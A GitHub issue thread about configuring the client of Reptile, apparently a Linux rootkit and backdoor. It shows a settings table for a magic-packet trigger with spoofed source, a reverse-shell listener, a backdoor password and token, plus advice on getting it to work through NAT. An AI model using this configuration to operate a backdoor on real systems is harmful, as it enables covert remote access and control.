### ISSUE TITLE
How to set PORT ?

### ISSUE THREAD

**Issue by MRchen532** [f0rb1dd3n/Reptile#57]
reptile-client> set PORT TCP=1
[-] wrong parameter!
How to set PORT ?

**Comment by pyperanger** [comment]
### RTFM

did you try read the manual bro???

The right argument is **RPORT** !!! 

![image](https://user-images.githubusercontent.com/10832641/49762260-64c6e480-fcb0-11e8-889f-7bc8d6f3f1a5.png)


### Reptile Usage: https://github.com/f0rb1dd3n/Reptile/wiki/Usage
### RTFM: https://en.wikipedia.org/wiki/RTFM

**Comment by MRchen532** [comment]
Yes，I see it,but there has been no access.I don't know if my parameter configuration is wrong. Can you help me?

**Comment by MRchen532** [comment]
VAR		VALUE			DESCRIPTION

LHOST		192.168.175.154		Local host to receive the shell
LPORT		4444			Local port to receive the shell
SRCHOST		192.168.175.151		Source host on magic packets (spoof)
SRCPORT		666			Source port on magic packets (only for TCP/UDP)
RHOST		192.168.175.151		Remote host
RPORT		TCP=1			Remote port (only for TCP/UDP)
PROT		80			Protocol to send magic packet (ICMP/TCP/UDP)
PASS		s3cr3t			Backdoor password (optional)
TOKEN		hax0r			Token to trigger the shell

reptile-client> run
[+] Using password: s3cr3t
[+] Listening on port 4444...

**Comment by f0rb1dd3n** [comment]
if you are trying to use it through NAT, use SRCHOST == LHOST

**Comment by MRchen532** [comment]
Ok, I have solved it, thank you!
I also want to know what technologies are used for communication, hidden file hiding, and remote control？
